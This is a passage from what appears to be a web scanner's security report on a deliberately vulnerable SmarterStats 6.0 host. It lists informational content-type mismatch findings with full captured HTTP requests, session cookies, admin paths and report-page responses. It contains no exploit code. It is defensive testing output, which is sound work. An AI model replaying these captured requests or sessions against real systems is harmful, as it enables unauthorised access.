   ctl00_MPH_HyperGrid1.AddUrlColumn('Url14',ctl00_MPH_HyperGrid1_Url14);
   ctl00_MPH_HyperGrid1.AutoSelect();
   
}
if (self.ctl00_MPH_HyperGrid1HGIsCallback)
   DelayedSetupctl00_MPH_HyperGrid1();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_HyperGrid1, 100);});
self.ctl00_MPH_HyperGrid1HGIsCallback = true;
|683|scriptStartupBlock|ScriptContentNoTags|function DoEdit_ctl00_BPH_btnEdit() {
   if(self.ctl00_MPH_HyperGrid1 == null || !self.ctl00_MPH_HyperGrid1.InitializeGrid) return ShowAlertWindow('No item has been selected');
   if (ctl00_MPH_HyperGrid1.GetUrlForSelectedRow == null) return;
   var url = ctl00_MPH_HyperGrid1.GetUrlForSelectedRow();
   if (url != null) { var grid = ctl00_MPH_HyperGrid1; var row = grid.GetSelectedRows()[0]; if (grid.GetVisibleRowByUid) row = grid.GetVisibleRowByUid(row); grid.DoDoubleClick(grid, row); }
   else {
       if (ctl00_MPH_HyperGrid1.GetSelectedRows().length == 0) ShowAlertWindow('No item has been selected');
       else ShowAlertWindow('You cannot edit multiple items at once.');
   }
}
|423|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_BPH_menuAction').hyperMenu({"ClearFloat":false,"IsContextMenu":false,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_BPH_menuAction_btnViewStats":"return false;","ctl00_BPH_menuAction_btnViewStats_btnImpersonateAdmin":"Impersonate(false);","ctl00_BPH_menuAction_btnViewStats_btnImpersonateUser":"Impersonate(true);"},"ClientCallbacks":{}}); });
|

10.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmViewReports.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmViewReports.aspx

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /Admin/frmViewReports.aspx?Custom=False&ReportType=ReportItem&subReportName=ADMIN_Traffic_Summary HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmViewReports.aspx?Custom=False&ReportType=ReportItem&subReportName=ADMIN_Traffic_Summary
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=goyfjk5bgnfdbekr0r35mk2c; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"208759633","TopBarSection":"AdminReports"}
Content-Length: 6950

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24MPH%24btnShowReport&ctl00%24MPH%24RadStartDate=2010-10-13&ctl00_MPH_RadStartDate_dateInput_text=10%2F13%2F2010&ctl00%24MPH%24RadStartDate%24dateInput=2010-10-13-00-00-00&ctl00_MPH_RadStartDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadStartDate_calendar_SD=%5B%5B2010%2C10%2C13%5D%5D&ctl00_MPH_RadStartDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C12%5D%5D&ctl00_MPH_RadStartDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00%24MPH%24RadEndDate=2010-10-29&ctl00_MPH_RadEndDate_dateInput_text=10%2F29%2F2010&ctl00%24MPH%24RadEndDate%24dateInput=2010-10-29-00-00-00&ctl00_MPH_RadEndDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadEndDate_calendar_SD=%5B%5B2010%2C10%2C29%5D%5D&ctl00_MPH_RadEndDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C12%5D%5D&ctl00_MPH_RadEndDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_mnuTable_hm1_CB=on&ctl00_MPH_mnuChart_mnuChart_BAR_CB=on&ctl00_MPH_mnuValue1_hm1_CB=on&ctl00_MPH_mnuValue2_hm2_CB=on&ctl00_MPH_mnuSort_hm1_CB=on&ctl00_MPH_mnuServer_hm0_CB=on&__EVENTTARGET=ctl00%24MPH%24btnShowReport&__EVENTARGUMENT=&__VIEWSTATE=%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%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%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%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&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:19:40 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 8596

1|#||4|620|updatePanel|ctl00_BPH_UpdatePanel2|
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       |11|updatePanel|ctl00_UpdatePanel1|
               
           |1925|updatePanel|ctl00_MPH_UP1|
           <div class="Report"><div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Traffic Summary</td><td class="ReportSubTitle">(Server)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/13/2010 to 10/29/2010</td></tr><tr><td class="ReportItemOptionLabel">Server:<td><td>All</td></tr></table></div></div><div class="Report" id="ADMIN_Traffic_Summary"> <div class='ReportChart'><img src="/Temp/64f2a244700744ef8e68498f4cef8964.png" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Server Name</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>localhost</td>

<td class='ar percentcol '>
<div class='percent percent-2147483648'></div>
0</td>
<td class='ar percentcol '>
<div class='percent percent-2147483648'></div>
0</td>
<td class='ar percentcol '>
<div class='percent percent-2147483648'></div>
0</td>
<td class='ar percentcol rc'>
<div class='percent percent-2147483648'></div>
0</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal rank lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar '>0</td>
<td class='FooterTotal ar '>0</td>
<td class='FooterTotal ar '>0</td>
<td class='FooterTotal ar rc'>0</td>
</tr>
<tr class=''>
<td class='FooterAverages rank lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar '>0</td>
<td class='FooterAverages ar '>0</td>
<td class='FooterAverages ar '>0</td>
<td class='FooterAverages ar rc'>0</td>
</tr>
</tfoot>
</table></div>
</div>
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       |0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||5276|hiddenField|__VIEWSTATE|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|53|asyncPostBackControlIDs||ctl00$MPH$btnGenerateReport,,ctl00$MPH$btnShowReport,|0|postBackControlIDs|||61|updatePanelIDs||tctl00$BPH$UpdatePanel2,,tctl00$UpdatePanel1,,tctl00$MPH$UP1,|0|childUpdatePanelIDs|||58|panelsToRefreshIDs||ctl00$BPH$UpdatePanel2,,ctl00$UpdatePanel1,,ctl00$MPH$UP1,|2|asyncPostBackTimeout||90|90|formAction||frmViewReports.aspx?Custom=False&ReportType=ReportItem&subReportName=ADMIN_Traffic_Summary|26|pageTitle||View Report - SmarterStats|51|scriptStartupBlock|ScriptContentNoTags|if (document.ResizeEvent) document.ResizeEvent();
|

10.4. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/AboutThisFolder.txt

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/AboutThisFolder.txt

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /App_Themes/AboutThisFolder.txt HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:52 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: "1CB66497A424400"
Vary: Accept-Encoding
Content-Type: text/plain
Content-Length: 29
Connection: Close

...This folder contains skins

10.5. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewReports.aspx

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}
Content-Length: 6928

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24MPH%24btnShowReport&__EVENTTARGET=ctl00%24MPH%24btnShowReport&__EVENTARGUMENT=&__VIEWSTATE=%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%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%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%2BAxcNc0IHwgGAEDK%2BKPo4AcfCQYAAGjBKVyhCR8KaB8LaB8MBQxTbWFydGVyVG9vbHMfDQUSRGF0ZVBpY2tlck92ZXJyaWRlHw4CAmQWBmYPFCsACA8WEh8LaB8MBQxTbWFydGVyVG9vbHMfCQYAAGjBKVyhCR8PBRUxMC85LzIwMTAgMTI6MDA6MDAgQU0fBgUTMjAxMC0xMC0wOS0wMC0wMC0wMB8QBQdyaUxhYmVsHxFoHwpoHwgGAEDK%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%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%3D&ctl00%24MPH%24RadStartDate=2010-10-03&ctl00_MPH_RadStartDate_dateInput_text=10%2F3%2F2010&ctl00%24MPH%24RadStartDate%24dateInput=2010-10-03-00-00-00&ctl00_MPH_RadStartDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadStartDate_calendar_SD=%5B%5D&ctl00_MPH_RadStartDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C9%5D%5D&ctl00_MPH_RadStartDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00%24MPH%24RadEndDate=2010-10-09&ctl00_MPH_RadEndDate_dateInput_text=10%2F9%2F2010&ctl00%24MPH%24RadEndDate%24dateInput=2010-10-09-00-00-00&ctl00_MPH_RadEndDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadEndDate_calendar_SD=%5B%5D&ctl00_MPH_RadEndDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C9%5D%5D&ctl00_MPH_RadEndDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00%24MPH%24hfDMFilename=&ctl00%24MPH%24hfDMRepor
t=&ctl00_MPH_mnuTable_rowCount_10_CB=on&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:27 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 45388

1|#||4|625|updatePanel|ctl00_BPH_UpdatePanel2|
           
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       |11|updatePanel|ctl00_UpdatePanel1|
               
           |312|updatePanel|ctl00_MPH_UpdatePanel1|
                   <table cellspacing='0' class='ReportOptionSection'>
                       <tr>
                           <td class='ReportTitle'>
                               <span id="ctl00_MPH_lblReportTitle"></span>
                           </td>
                           <td class='ReportSubTitle'>
                               (<span id="ctl00_MPH_lblReportSubTitle"></span>)
                           </td>
                       </tr>
                   </table>
               |38138|updatePanel|ctl00_MPH_UP1|
           <div class="Report"><div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Top Pages</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Top_Pages"> <div class='ReportChart'><img src="/Temp/3022c349e42e4a16915d331a96969eb5.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='ac mine'>&nbsp;</th><th class='al '>Page</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fapptesting.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>apptesting.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
24,906</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
14</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
1,494</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2f','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span></a></td>

<td class='ar percentcol '>
<div class='percent percent8'></div>
7,968</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
676</td>
<td class='ar percentcol rc'>
<div class='percent percent7'></div>
431</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fdefault.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>default.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent7'></div>
6,980</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
33</td>
<td class='ar percentcol rc'>
<div class='percent percent6'></div>
361</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fcloudscandetails.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>cloudscandetails.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent7'></div>
6,732</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
16</td>
<td class='ar percentcol rc'>
<div class='percent percent8'></div>
502</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fsales.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>sales.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent4'></div>
4,573</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
16</td>
<td class='ar percentcol rc'>
<div class='percent percent6'></div>
354</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2flearning.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>learning.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent4'></div>
4,573</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
17</td>
<td class='ar percentcol rc'>
<div class='percent percent4'></div>
270</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fsitemap.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>sitemap.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent4'></div>
4,332</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
16</td>
<td class='ar percentcol rc'>
<div class='percent percent3'></div>
192</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fria.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>ria.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent4'></div>
4,091</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
15</td>
<td class='ar percentcol rc'>
<div class='percent percent2'></div>
161</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2ftest.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>test.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent3'></div>
3,121</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol rc'>
<div class='percent percent2'></div>
153</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2freport.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>report.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent2'></div>
2,122</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
20</td>
<td class='ar percentcol rc'>
<div class='percent percent11'></div>
665</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=3>Other Items (13)</td>
<td class='FooterTotal ar percentcol'>707</td>
<td class='FooterTotal ar percentcol'>&nbsp;</td>
<td class='FooterTotal ar rc percentcolrc'>10</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=3>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,105</td>
<td class='FooterTotal ar percentcol'>&nbsp;</td>
<td class='FooterTotal ar rc percentcolrc'>4,594</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=3>Average(s)</td>
<td class='FooterAverages ar percentcol'>3,048</td>
<td class='FooterAverages ar percentcol'>&nbsp;</td>
<td class='FooterAverages ar rc percentcolrc'>200</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Referring Sites</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="ReferringSites"> <div class='ReportChart'><img src="/Temp/b2972344c54b45e38070638051bc9478.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Host</th><th class='ar rc'>Visits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'>No Referrer <i>(bookmark or direct-entry)</i></a></td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
681</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '><a href="http://www.sitetalk-world.info" target="_blank" class='ReportLink'>www.sitetalk-world.info</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '><a href="http://www.vilnerable.smarterstats.6.0.host" target="_blank" class='ReportLink'>www.vilnerable.smarterstats.6.0.host</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '><a href="http://yandex.ru" target="_blank" class='ReportLink'>yandex.ru</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '><a href="http://seo.vilnerable.smarterstats.6.0.host" target="_blank" class='ReportLink'>seo.vilnerable.smarterstats.6.0.host</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '><a href="http://www.sitetalk-friends.com" target="_blank" class='ReportLink'>www.sitetalk-friends.com</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '><a href="http://www.way-to-success.com" target="_blank" class='ReportLink'>www.way-to-success.com</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '><a href="http://www2.fastdial.net" target="_blank" class='ReportLink'>www2.fastdial.net</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '><a href="http://www.google.ru" target="_blank" class='ReportLink'>www.google.ru</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '><a href="http://support.mozilla.com" target="_blank" class='ReportLink'>support.mozilla.com</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Other Items (8)</td>
<td class='FooterTotal ar rc percentcolrc'>8</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>703</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>39</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Entry Pages</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Path_EntryPages"> <div class='ReportChart'><img src="/Temp/3568cde247644a1b9ec6e79fbea220fc.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='ac mine'>&nbsp;</th><th class='al '>Page</th><th class='ar rc'>Visits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2f','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span></a></td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
668</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fdefault.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>default.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
21</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2ftest.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>test.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fsales.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>sales.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2freport.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>report.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fimages%2f','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>images<wbr /><span class='slash'>/</span></a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

